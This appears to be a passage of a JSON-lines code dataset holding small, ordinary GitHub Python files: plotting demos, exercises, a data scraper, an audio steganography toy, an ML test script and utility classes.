s.close()\r\n","repo_name":"Parsaahmadiafshar/some-samples-for-python","sub_path":"practice1/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74053892327","text":"import dash\nimport dash_renderer\nimport dash_core_components as dcc\nimport dash_html_components as html\n\napp = dash.Dash()\n\napp.layout = html.Div(children=[\n    html.H1('Trying out dash'),\n    dcc.Graph(id='Example',\n              figure={\n                  'data':[{'x':[1,2,3,4,5,6,7,8],'y':[1,4,9,16,25,36,49,64],'type':'line','name':'Xars'},\n                          {'x':[1,2,3,4,5,6,7,8],'y':[1,3,8,15,24,35,48,63],'type':'bar','name':'Mars'}],\n                  'layout': {\n                      'title': 'Basic'\n\n                  }\n              }\n\n              )\n\n])\n\nif __name__=='__main__' :\n    app.run_server(debug=True)\n\n","repo_name":"Shristi19/DataVisualization","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71913577128","text":"#Given a natural number A. Determine which Fibonacci number it is, i.e. print the number n such that f_n = A. 
If A is not a Fibonacci number, print -1.\r\nc = int(input())\r\nf1 = 1\r\nf2 = 1\r\na = [1, 1]\r\ni = 0\r\nwhile i < 15:\r\n    f_sum = f1 + f2\r\n    f1 = f2\r\n    f2 = f_sum\r\n    a.append(f2)\r\n    i = i + 1\r\nq = 0\r\nfor i in range (len(a)):\r\n    if c == a[i]:\r\n        print (i+1)\r\n        q += 1\r\nif q == 0:\r\n    print ('-1')","repo_name":"Supervlada3000/Python-HW","sub_path":"21.10.21/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5378279726","text":"from .list_node import ListNode\n\nclass ReverseLinkedList:\n    def reverseList(self, head: ListNode) -> ListNode:\n        cur, rev = head, None\n        while cur:\n            rev, rev.next, cur = cur, rev, cur.next\n        return rev\n\n    def reverseList2(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        if not head: return head\n        prev, cur, next_ = None, head, None\n        while cur:\n            next_ = cur.next\n            cur.next = prev\n            prev = cur\n            cur = next_\n        return prev\n","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/linked_list/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70572454888","text":"\"\"\"\n@author: Saurabh.Powar\n\"\"\"\n\nimport pandas as pd\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom prep_dataset import SRMRDataset\nfrom crnn_model import CRNN_Model\n\nBASE_PATH = '/home/sspowar/scratch/archive/LA/LA'\n\n# Load saved model\nmodel = CRNN_Model(num_class=2, msr_size=(23, 8), rnn_hidden_size=128, dropout=0.7, tem_fac=[1, 2, 1])\nmodel.load_state_dict(torch.load(\"crnn_model_epoch_10.pt\", map_location=torch.device('cpu')))\nmodel.eval() # Set the model to evaluation mode\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmodel.double()\nmodel.to(device)\n\n# Load test data\ntest_df = pd.read_csv(f'{BASE_PATH}/ASVspoof2019_LA_cm_protocols/ASVspoof2019.LA.cm.dev.trl.txt',\n                      sep=\" \", header=None)\ntest_df.columns =['speaker_id','filename','system_id','null','class_name']\ntest_df.drop(columns=['null'], inplace=True)\ntest_df['filepath'] = f'{BASE_PATH}/ASVspoof2019_LA_dev/flac/'+test_df.filename+'.flac'\ntest_df['target'] = (test_df.class_name=='spoof').astype('int32')\n\ntest_dataset = SRMRDataset(test_df)\ntest_loader = DataLoader(test_dataset, batch_size=16, shuffle=True)\n\ntotal_correct = 0\ntotal_samples = 0\n\n# Testing loop\nwith tqdm(test_loader, desc=\"Testing\") as pbar:\n    for data, target in pbar:\n        data, target = data.to(device), target.to(device)\n        with torch.no_grad():\n            output = model(data)\n        predicted_labels = (output > 0.5).float() # Assuming 0.5 threshold for binary classification\n        total_correct += (predicted_labels == target).sum().item()\n        total_samples += target.size(0)\n\ntest_accuracy = total_correct / total_samples\nprint(f\"Test Accuracy: {test_accuracy:.4f}\")\n","repo_name":"Spnetic-5/Audio_Deepfake_Mitacs23","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17653384520","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.conf.urls import url\n\nimport project_management.views as views\n\n\nurlpatterns = [\n    url(r'^$', 
views.InvestigationListView.as_view(),\n        name='pm_investigation_list'),\n    url(r'^detail/(?P<slug>[\\w-]+)$', views.InvestigationDetailView.as_view(),\n        name='pm_investigation_detail'),\n    url(r'^create/(?P<slug>[\\w-]+)$', views.InvestigationCreateView.as_view(),\n        name='pm_investigation_create'),\n    url(r'^edit/(?P<slug>[\\w-]+)$', views.InvestigationUpdateView.as_view(),\n        name='pm_investigation_edit'),\n]\n","repo_name":"emergence-lab/emergence-lab","sub_path":"project_management/urls/investigations.py","file_name":"investigations.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72520164009","text":"import requests \n\nURL = \"https://pokeapi.co/api/v2/generation/1/\"\nreq = requests.get(URL)\n\n\n\nif req.status_code == 200:\n    dados_rq = req.json()\n    for pokemon in dados_rq['pokemon_species']:\n        print(pokemon['name'])\n\n    ","repo_name":"ParaQueNome/Desenvolvimento-Web-3","sub_path":"django/consumo_api/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74429708007","text":"#1: Variable scope (global and local variables)\na = 100 # global variable\ndef f1():\n    global a # to change a global variable's value inside a function, declare it with the global keyword\n    print(\"Global variable: \" + str(a)) # print the global variable\n    a = 300\n\nf1()\nprint(\"Global variable: \" + str(a))\n\nprint(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n\n#2: Test of a global and a local variable with the same name\nb = 100\ndef f2():\n    b = 3 # local variable with the same name\n    print(\"Local variable: \" + str(b))\n\nf2()\nprint(\"Global variable: \" + str(b)) # b is still 100, unchanged, because it was not declared with the global keyword inside the function, so its value does not change\n\nprint(\"__________________________________________________\")\nprint(end='\\n\\n\\n')\n\n\n#3: Print local and global variables\n\nc = 100\ndef f3(a,b,c):\n    print(a,b,c)\n    print(locals()) # print the local variables\n    print(\"#\"*20)\n    print(globals()) # print the global variables\n\nf3(2,3,4)\nprint(end='\\n\\n\\n')\n\nprint(\"_____________________Efficiency test of local vs global variables_____________________________\")\n#4: Efficiency test of local vs global variables (local variables are looked up and accessed faster than global ones, so prefer them, especially in loops)\nimport math\nimport time\n\ndef test01():\n    start = time.time()\n    for i in range(10000000):\n        math.sqrt(30) # calling it through math like this is a global lookup\n    end = time.time()\n    print(\"Global variable elapsed time {0}\".format((end-start)))\n\n\ndef test02():\n    dd = math.sqrt # assign the sqrt function under math directly to the variable dd\n    start = time.time()\n    for i in range(10000000):\n        dd(30)\n    end = time.time()\n    print(\"Local variable elapsed time {0}\".format((end-start)))\n\ntest01()\ntest02()","repo_name":"pod1019/www","sub_path":"my_py_test/mypy/变量作用域.py","file_name":"变量作用域.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18541356314","text":"import re\nfrom typing import Optional\n\n\ndef url_pattern_skip_check(url: str, url_pattern: Optional[str]):\n    '''\n    If the spider was given a url_pattern argument, check the url against the pattern.\n    If the check finds no match, return True (the url should be skipped).\n    If the check finds a match, return False (the url should not be skipped).\n    '''\n    skip_flg:bool = False\n    # if 'url_pattern' in kwargs: # url filtering specified\n    if url_pattern: # url filtering specified\n        # pattern = re.compile(kwargs['url_pattern'])\n        pattern = re.compile(url_pattern)\n        if pattern.search(url) == None:\n            skip_flg = True\n\n    return skip_flg","repo_name":"pubranko/BrownieAtelier","sub_path":"app/news_crawl/spiders/common/url_pattern_skip_check.py","file_name":"url_pattern_skip_check.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30654469358","text":"import sys\nimport wave as wav\nimport struct as st\nimport math as mt\nimport 
scipy\nimport numpy as np\nimport audiolab\n\n\ndef get_first_frequency(seedno):\n    np.random.seed(seedno)\n    if seedno > 7500:\n        return np.random.randint(25001, 30000)\n    return np.random.randint(20000, 25000)\n\ndef get_next_frequency(seedno):\n    np.random.seed(seedno)\n    if seedno > 25000:\n        return np.random.randint(25001, 30000)\n    return np.random.randint(20000, 25000)\n\nprint(\"Please choose one of the following options:\")\nprint(\"1. Encode text into audio file.\")\nprint(\"2. Decode text from audio file.\")\nprint(\"3. Hide encoded message in another audio file.\")\nchoice = int(input(\"Your choice: \"))\nprint(\"-----------------\")\n\n\n###### Encode text message ######\nif choice == 1:\n    message_str = str(input(\"Enter text message to encode: \"))\n    # These will be recalculated after each window for cryptographic security\n    seed_mark_int = int(input(\"Enter the key for the mark frequencies (value between 7501 and 15000): \"))\n    seed_space_int = int(input(\"Enter the key for the space frequencies (value between 1500 and 7500): \"))\n    #Translates message from ascii to a binary list\n    def message_to_bin(msg):\n        out = []\n        for i in msg:\n            byte = []\n            inInt= ord(i)\n            top = 128\n            byte.append(0)\n            while top > 1:\n                if (inInt/top) >= 1:\n                    byte.append(1)\n                    inInt -= top\n                else:\n                    byte.append(0)\n                top = top/2\n            byte.append(int(inInt))\n            byte.append(1)\n            for i in byte[-1::-1]:\n                out.append(i)\n        return out\n    #turns the current byte into a sine wave and writes it to the file\n    def write_sine(bit, myFile, mark_freq, space_freq):\n        sine_wave = []\n        if bit == 1:\n            sine_wave = [np.sin(2 * np.pi * float(mark_freq) * i / 48000) for i in range(160)]\n        else:\n            sine_wave = [np.sin(2 * np.pi * float(space_freq) * i / 48000) for i in range(160)]\n        for i in sine_wave:\n            myFile.writeframes(st.pack(\"h\", int(i*pow(2, 14))))\n\n    #creates a .wav file and then calls write_sine() to fill it\n    def build_a_wav(filename):\n        wavefile = wav.open(filename, 'wb')\n        wavefile.setnchannels(1)\n        wavefile.setsampwidth(2)\n        wavefile.setframerate(48000)\n        wavefile.setnframes(sizeof)\n        wavefile.setcomptype('NONE', 'nocompression')\n        mark_freq = get_first_frequency(seed_mark_int)\n        space_freq = get_first_frequency(seed_space_int)\n        for i in bits:\n            write_sine(i, wavefile, mark_freq, space_freq)\n            mark_freq = get_next_frequency(mark_freq)\n            space_freq = get_next_frequency(space_freq)\n        wavefile.close()\n\n    filename = str(input(\"Please input a name for your file (include .wav)\"))\n    bits = message_to_bin(message_str)\n    sizeof = len(bits)*160\n    build_a_wav(filename)\n    print(\"Built your encoded wav file: \" +filename+\".wav\")\n    \n\n###### Decode text message ######\nelif choice == 2:\n    file = str(input(\"Enter audio path to decode: \"))\n    seed_mark_int = int(input(\"Enter the key for the mark frequencies: \"))\n    seed_space_int = int(input(\"Enter the key for the space frequencies: \"))\n    wav_file = wav.open(file, 'rb') # Open the audio file.\n    wav_channels = wav_file.getnchannels() # Get total number of channels.\n    wav_frames = wav_file.getnframes() # Get total number of frames.\n    frame_rate = wav_file.getframerate() # Frame rate.\n    sample_size = int(frame_rate/300) # Frames sample size.\n    mark_freq = get_first_frequency(seed_mark_int) # Mark frequency. (updated for crypto)\n    space_freq = get_first_frequency(seed_space_int) # Space frequency. 
(updated for crypto)\n\n    print(sample_size)\n    print(\"rate: \", frame_rate)\n    print(\"frames: \", wav_frames)\n    print(\"width: \", wav_file.getsampwidth())\n    print(\"channels: \", wav_channels)\n\n    # Read frames as an array of bytes.\n    wav_bytes = wav_file.readframes(wav_frames)\n\n    # Convert frames from bytes to floating point.\n    wav_floats = st.unpack(\"%ih\" % (wav_frames * wav_channels), wav_bytes)\n    wav_floats = [float(i) / pow(2, 15) for i in wav_floats]\n\n    # Goertzel filter.\n    def filter(sample, filter_freq):\n        target_filter = (2*mt.pi*filter_freq)/frame_rate\n        normalize = np.exp(np.complex(0, target_filter*sample_size))\n        coef = np.array([np.exp(np.complex(0, -target_filter * i))\n                         for i in range(sample_size)])\n        return abs(normalize * np.dot(sample, coef))\n\n    # Get the FSK bits\n    def get_FSK(mark_freq, space_freq):\n        bits = []\n        # Iterate through the frames by sample size (160 frames/sample)\n        for i in range(0, len(wav_floats), sample_size):\n            # Get the next sample (160 frames)\n            curr_sample = wav_floats[i: i + sample_size]\n\n            # Get the mark/space size\n            mark_size = filter(curr_sample, mark_freq)\n            space_size = filter(curr_sample, space_freq)\n\t\t\n            #Update mark and space frequency\n            mark_freq = get_next_frequency(mark_freq)\n            space_freq = get_next_frequency(space_freq)\n            # Compare the mark/space size\n            if(mark_size > space_size):\n                bits.append(1)\n            else:\n                bits.append(0)\n        return bits\n\n\n    def get_message(fsk):\n        message = \"\"\n        for i in range(0, len(fsk), 10):\n            current_byte = (fsk[i: i+10])[1:9] # Get the middle 8 bits\n            pow = [2 ** j for j in range(8)] # Get powers of 2 for total bits\n            ascii = np.dot(current_byte, pow) # Get the ascii value\n            message += chr(ascii) # Convert ascii to char\n        return message\n\n\n    print(get_message(get_FSK(mark_freq, space_freq))) # Print the hidden message\n\n\nelif choice == 3:\n    message_to_hide = str(input(\"Please enter the path of the encoded message to hide: \"))\n    file_to_hide_in = str(input(\"Please enter the name of the file to hide the message in: \"))\n    a, fs, enc = audiolab.wavread(message_to_hide)\n    b, fs, enc = audiolab.wavread(file_to_hide_in)\n    c = scipy.vstack((a, b))\n    audiolab.wavwrite(c, 'hidden.wav', fs, enc)\n    print(\"New file saved as 'hidden.wav'\")\n\nelse:\n    print(\"Your input is not correct!\")\n\nsys.exit()\n","repo_name":"BaderAlshaya/Steganography","sub_path":"Steganography.py","file_name":"Steganography.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8223861253","text":"lista = []\npar = []\nimpar = []\nwhile True:\n    n = int(input('Enter the value: '))\n    opcao = input('Do you want to continue?[Y/N]').upper()\n    lista.append(n)\n    if n % 2 == 0:\n        par.append(n)\n    else:\n        impar.append(n)\n    if opcao == 'Y':\n        print('Continuing...')\n    if opcao == 'N':\n        print(f'The full list is {lista}'\n              f'\\nThe list of even numbers is {par}'\n              f'\\nThe list of odd numbers is {impar}')\n        break","repo_name":"pemedeiros/python-CeV","sub_path":"pacote-download/CursoemVideo/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74682874407","text":"# Features to extract:\n# --------------------\n#\n# - Word counts for words that appear 5 times or more in the training set (transformed to lowercase)\n# - Count of: ?, !, ,
\"\n coordinates_pattern = r\"\\s*([^<]+)\\s*\"\n name_matches = re.findall(name_pattern, data)\n coordinates_matches = re.findall(coordinates_pattern, data)\n\n if len(name_matches) == len(coordinates_matches):\n data_list = []\n for name, coordinates in zip(name_matches, coordinates_matches):\n longitude, latitude, _ = coordinates.split(\",\")\n\n longitude = round(float(longitude.strip()), 7)\n latitude = round(float(latitude.strip()), 7)\n data_list.append([name.strip(), longitude, latitude])\n\n df = pd.DataFrame(data_list, columns=[\"Name\", \"Longitude\", \"Latitude\"])\n df[\"id\"] = df[\"Name\"].str.extract(r\"\\((\\d+)\\)$\")\n\n today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n log_file_path = os.path.join(data_directory, f\"markers-{today_date}.csv\")\n logging.info(f\"Saving data to {log_file_path}\")\n df.to_csv(log_file_path, index=False)\n\n return df\n else:\n raise Exception(\n \"Number of names and coordinates don't match. Data extraction failed.\"\n )\n\n except requests.exceptions.RequestException as e:\n logging.error(f\"Failed to fetch data from the URL: {e}\")\n raise Exception(f\"Failed to fetch data from the URL: {e}\")\n \n\ndef categ_dict(df, link):\n \"\"\"\n Create dictionaries for ID to place and category mapping.\n\n Args:\n df (pandas.DataFrame): Dataframe containing extracted data.\n link (str): URL to fetch vehicle_categories information.\n\n Returns:\n tuple: Tuple containing dictionaries (id_name, cat_dict).\n \"\"\"\n try:\n id_name = dict(zip(df.id, df.Name))\n category_content = requests.get(link).text\n cat_soup = BeautifulSoup(category_content, \"lxml\")\n categories = cat_soup.find(\"select\", {\"class\": \"selectstyle\"})\n cat_text = categories.get_text()\n cat_list = list(cat_text.split(\"\\n\"))\n cat_list = cat_list[1::]\n cat_id = [0, 1, 2, 3, 4, 5, 6, 7]\n cat_dict = dict(zip(cat_id, cat_list))\n logging.info(\"Category dictionary created.\")\n return id_name, cat_dict\n except Exception as e:\n logging.error(f\"Error in creating category dictionary: {e}\")\n raise\n \n\ndef get_data(df, id_name, cat_dict):\n \"\"\"\n Fetch and process toll data from web sources and save to CSV.\n\n Args:\n df (pandas.DataFrame): Dataframe containing plaza information data.\n id_name (dict): ID name to place mapping.\n cat_dict (dict): Category mapping.\n \"\"\"\n df_final = pd.DataFrame()\n\n for i in df.id:\n data_to_concat = []\n\n for j in range(8):\n link = f\"https://datamall.lta.gov.sg/mapapp/pages/tables/{i}_table_{j}.html\"\n try:\n html_content = requests.get(link).text\n soup = BeautifulSoup(html_content, \"lxml\")\n rate_table = soup.find(\"table\", {\"class\": \"styler\"})\n\n if len(rate_table) != 3:\n rows_data = []\n\n for row in rate_table.find_all(\"tr\"):\n columns = row.find_all(\"td\")\n\n place = i\n days = j\n time = columns[0].text.strip()\n rates = columns[1].text.strip().replace(\"$\", \"\")\n\n rows_data.append(\n {\n \"plaza_name\": place,\n \"vehicle_cat\": days,\n \"time\": time,\n \"rates\": rates,\n }\n )\n\n df_temp = pd.DataFrame(rows_data)\n df_temp = df_temp.replace(\n {\"plaza_name\": id_name, \"vehicle_cat\": cat_dict}\n )\n df_temp[\"rates\"] = pd.to_numeric(df_temp[\"rates\"], errors=\"coerce\")\n data_to_concat.append(df_temp)\n except requests.exceptions.RequestException as e:\n logging.warning(f\"Failed to fetch data from URL {link}: {e}\")\n # Log the error and continue gracefully\n\n if data_to_concat:\n df_final = pd.concat([df_final] + data_to_concat, ignore_index=True)\n # logging.info(f\"Data 
concatenated and appended to df_final for plaza_id {i}\")\n\n    if not df_final.empty:\n        df_final[[\"vehicle_cat\", \"weekdays/weekends\"]] = df_final[\n            \"vehicle_cat\"\n        ].str.split(\"(\", expand=True)\n        df_final[\"weekdays/weekends\"] = df_final[\"weekdays/weekends\"].str.replace(\n            \")\", \"\"\n        )\n\n        today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        log_file_path = os.path.join(data_directory, f\"toll-rates-{today_date}.csv\")\n        df_final.to_csv(\n            log_file_path, mode=\"a\", encoding=\"utf-8-sig\", header=True, index=False\n        )\n        logging.info(f\"Saved data to {log_file_path}\")\n\n\ndef get_latest_files(directory, file_pattern):\n    \"\"\"\n    Get the latest files from the directory based on the given pattern.\n\n    Args:\n        directory (str): Directory path.\n        file_pattern (str): File name pattern.\n\n    Returns:\n        list: List of the latest files.\n    \"\"\"\n    if not os.path.exists(directory):\n        logging.error(f\"The directory '{directory}' does not exist.\")\n        raise FileNotFoundError(f\"The directory '{directory}' does not exist.\")\n\n    files_with_timestamps = []\n    for file in glob.glob(os.path.join(directory, f\"{file_pattern}*.csv\")):\n        files_with_timestamps.append((file, os.path.getmtime(file)))\n\n    files_with_timestamps.sort(key=lambda x: x[1], reverse=True)\n\n    latest_files = [file[0] for file in files_with_timestamps[:2]]\n    logging.info(f\"Latest files matching pattern '{file_pattern}' are {latest_files}\")\n    return latest_files\n\n\ndef comparison(previous_file_path, current_file_path):\n    \"\"\"\n    Compare markers and toll data between previous and current data and save differences to CSV.\n\n    Args:\n        previous_file_path (str): Path to the previous file.\n        current_file_path (str): Path to the current file.\n    \"\"\"\n    if \"toll\" in previous_file_path or \"toll\" in current_file_path:\n        previous_df = pd.read_csv(previous_file_path)\n        current_df = pd.read_csv(current_file_path)\n        file = \"toll\"\n    else:\n        previous_df = pd.read_csv(previous_file_path, index_col=\"id\")\n        current_df = pd.read_csv(current_file_path, index_col=\"id\")\n        file = \"markers\"\n\n    if previous_df.shape == current_df.shape:\n        df_diff = previous_df.compare(current_df)\n        if len(df_diff) == 0:\n            print(f\"No change in {file} data\")\n            logging.info(f\"No change in {file} data\")\n\n        else:\n            # renaming columns to appropriate names\n            df_diff.columns = df_diff.columns.set_levels(\n                [\"previous_df\", \"current_df\"], level=1\n            )\n\n            # flattening the multi-index\n            df_diff.columns = [\"_\".join(col).strip() for col in df_diff.columns.values]\n\n            # getting the current date\n            today_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\n            # saving the difference file\n            df_diff.to_csv(f\"{file}-difference-{today_date}.csv\", encoding=\"utf-8-sig\")\n            logging.info(f\"Difference file saved to {file}-difference-{today_date}.csv\")\n            print(\" Difference found\")\n\n    else: \n        print(\"Previous and current data shapes are different. Can't Compare\")\n        logging.info(\"Previous and current data shapes are different. 
Can't Compare\")\n \n return\n\n\ndef main():\n try:\n # Create the data directory if it doesn't exist\n if not os.path.exists(data_directory):\n os.makedirs(data_directory)\n \n df = extract_plaza_info_from_kml(kml_path)\n id_name, cat_dict = categ_dict(df, link)\n get_data(df, id_name, cat_dict)\n \n # Get the latest toll data and markers files\n latest_tolldata_files = get_latest_files(data_directory, \"toll\")\n latest_markers_files = get_latest_files(data_directory, \"markers\")\n \n # Compare toll rates and markers between the latest files\n comparison(latest_markers_files[1], latest_markers_files[0])\n comparison(latest_tolldata_files[1], latest_tolldata_files[0])\n\n except Exception as e:\n logging.error(f\"Error in extraction and comparison: {e}\")\n raise\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sachinshrma03/data-extraction-comparison","sub_path":"extractor-and-comparator.py","file_name":"extractor-and-comparator.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18099004584","text":"from threading import Thread\nfrom time import sleep\n\nfrom ... import application\nfrom .action import Action\nfrom .result import Result\n\n\nclass Agent:\n\n def __init__(self, grid, action_types):\n self.grid = grid\n self.action_types = action_types\n self.actions = []\n self.action_dict = {}\n self.states = {}\n self.state()\n\n self.__init_actions()\n\n def __init_actions(self):\n identifier = 0\n for cell in self.grid.cells:\n for at in self.action_types:\n action = Action(identifier, cell, at)\n self.actions.append(action)\n self.action_dict[identifier] = action\n identifier += 1\n\n def reset(self):\n application.init_keyboard()\n application.text.reset()\n\n def __next_state__(self):\n max_s = -1\n for v in self.states.values():\n if v > max_s:\n max_s = v\n return max_s + 1\n\n def state(self):\n if application.keyboard.__hash__() not in self.states:\n self.states[application.keyboard.__hash__()] = self.__next_state__()\n return self.states[application.keyboard.__hash__()]\n\n def start_demo(self):\n for a in self.actions:\n print(self.execute(a.identifier))\n import time\n time.sleep(0.5)\n\n def execute(self, action_id):\n def execute_wait(action):\n action.execute()\n sleep(action.action_type.duration)\n\n try:\n thread = Thread(target=execute_wait, args=(self.action_dict[action_id], ))\n thread.start()\n return Result(application.text.value, self.state(), bool(application.text.value))\n\n except KeyError:\n return f'Action {action_id} does not exist'\n","repo_name":"Devinpennings/keyboard-environment","sub_path":"logic/agent/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34328390549","text":"def determine_delimiter(filepath):\n delimiters = [',', '\\t', ';']\n\n delimiter_count = {}\n with open(filepath, 'r') as file:\n for line in file:\n for delimiter in delimiters:\n if delimiter in line:\n delimiter_count[delimiter] = delimiter_count.get(delimiter, 0) + 1\n\n return delimiter_count\n\nfile_path = '../../genomeprep/opensnp_txt/2406.23andme.1498.txt'\ndelimiter_counts = determine_delimiter(file_path)\nif delimiter_counts:\n print(\"Delimiter Counts:\")\n for delimiter, count in delimiter_counts.items():\n print(f\"{delimiter}: {count}\")\nelse:\n print(f\"No delimiter found in 
{file_path}\")\n","repo_name":"dnastory/metrix","sub_path":"scripts/delimiter.py","file_name":"delimiter.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40273799065","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 17 15:28:14 2021\r\n\r\n@author: 月光下的云海\r\n\"\"\"\r\n\r\nfrom MODELS.SLSR import SLSR as model\r\nimport argparse\r\nfrom DLL.utils import fspecial,GetBlurMtx\r\nimport numpy as np\r\nfrom glob import glob\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nfrom tensorflow.python.platform import gfile\r\nimport os\r\nfrom DLL.Valuation import psnr,ssim\r\nfrom time import time\r\nimport cv2 as cv\r\n\r\ndef test_SLSR_on_dataset(scale,path):\r\n \r\n data_set = os.path.split(path)[0]\r\n data_set = os.path.split(data_set)[-1]\r\n \r\n if not os.path.exists('./RESULT/SLSRx{}/'.format(scale)+data_set):\r\n os.makedirs('./RESULT/SLSRx{}/'.format(scale)+data_set)\r\n \r\n slsr = model(scale = scale,epoch = 0)\r\n blur_kernel = fspecial(kernel_size = 17,sigma = 4)\r\n iH = GetBlurMtx(blur_kernel,1,imshape = (16,16)).toarray().astype(np.float32)\r\n pbPath = \"./TRAINED_MODEL/SLSR_x{}.pb\".format(scale)\r\n sess = tf.Session(config = slsr.config)\r\n with gfile.FastGFile(pbPath,'rb') as f:\r\n graph_def = tf.GraphDef()\r\n graph_def.ParseFromString(f.read())\r\n sess.graph.as_default()\r\n tf.import_graph_def(graph_def,name = '')\r\n LR_tensor = sess.graph.get_tensor_by_name(\"images:0\")\r\n HR_tensor = sess.graph.get_tensor_by_name(\"add_100:0\")\r\n #H = tf.placeholder(shape = [256,256],dtype = tf.float32,name = 'H')\r\n H = sess.graph.get_tensor_by_name(\"H:0\")\r\n val_img_paths = glob(path)\r\n avg_psnr = 0\r\n for p in val_img_paths:\r\n fn = os.path.split(p)[-1]\r\n print(\"Testing on \"+ fn + ' ... ...')\r\n t = time()\r\n fn = os.path.splitext(fn)[0]\r\n hr = cv.imread(p)\r\n hr = Image.fromarray(hr.astype(dtype=np.uint8))\r\n \r\n lr = hr.resize((hr.size[0]//scale,hr.size[1]//scale), Image.BICUBIC)\r\n hr = np.array(hr)\r\n lr = np.array(lr).astype(np.uint8)\r\n lr = lr.reshape((1,)+lr.shape)\r\n #hr,lr = get_image(p, scale, None)\r\n res = sess.run(HR_tensor, feed_dict={LR_tensor: lr / 255.0, H:iH})\r\n \r\n res = res[0]*255.0\r\n res = res.clip(min = 0, max = 255)\r\n #res = res.astype(np.uint8)\r\n ipsnr,issim = psnr(hr,res),ssim(hr,res)\r\n print(\"Time Elapsed:\", time()-t,end = ' ')\r\n print('The PSNR:{:.4f} and SSIM:{:.4f}'.format(ipsnr,issim))\r\n avg_psnr += ipsnr\r\n #Image.fromarray(res).save('./RESULT/SLSRx{}/'.format(scale) +'/'+data_set+'/'+ fn +'_{:.4f}_{:.4f}.png'.format(ipsnr,issim))\r\n cv.imwrite('./RESULT/SLSRx{}/'.format(scale) +'/'+data_set+'/'+ fn +'_{:.4f}_{:.4f}.png'.format(ipsnr,issim),res)\r\n sess.close()\r\n print(\"Avg. 
:\",avg_psnr/len(val_img_paths))\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--scale', type=int, default = 4, help='Scale Factor')\r\nparser.add_argument('--path', type = str, default = './DATABASE/Set5/*.bmp')\r\nargs = parser.parse_args()\r\n\r\nif __name__ == '__main__':\r\n \r\n test_SLSR_on_dataset(args.scale,args.path)\r\n \r\n ","repo_name":"Bovbene/SLKPSR","sub_path":"test_SLSR_on_dataset.py","file_name":"test_SLSR_on_dataset.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17591030428","text":"import numpy as np\nfrom typing import Union, Tuple, Optional, cast\nfrom abc import abstractmethod\n\nclass MatrixBase(object):\n def __init__(self) -> None:\n super().__init__()\n\n self.shape = (1,1)\n self.ndim = 2\n\n def is_diagonal(self) -> bool:\n return self.shape[0] == self.shape[1]\n\n def __neg__(self)->'MatrixBase':\n return -1.0 * self\n\n @abstractmethod\n def asmatrix(self)->np.ndarray:\n pass\n\n @abstractmethod\n def __mul__(self, other: Union[float, complex, np.float64, np.complex128])->'MatrixBase':\n return NotImplemented\n\n __rmul__ = __mul__\n\n @abstractmethod\n def __matmul__(self, other: Union['MatrixBase', np.ndarray])->Union['MatrixBase',np.ndarray]:\n return NotImplemented\n\n @abstractmethod\n def __add__(self, other: 'MatrixBase')->'MatrixBase':\n return NotImplemented\n\n @abstractmethod\n def conjugate(self)->'MatrixBase':\n pass\n\n @property\n @abstractmethod\n def T(self)->'MatrixBase':\n pass\n\n conj = conjugate\n\n def __sub__(self, other)->'MatrixBase':\n return self + (-other)\n\n @abstractmethod\n def inv(self)->'MatrixBase':\n pass\n\n @abstractmethod\n def hash(self)->int:\n pass\n\nclass DenseMatrix(MatrixBase):\n def __init__(self, matrix: np.ndarray) -> None:\n assert isinstance(matrix, np.ndarray)\n assert matrix.ndim == 2\n 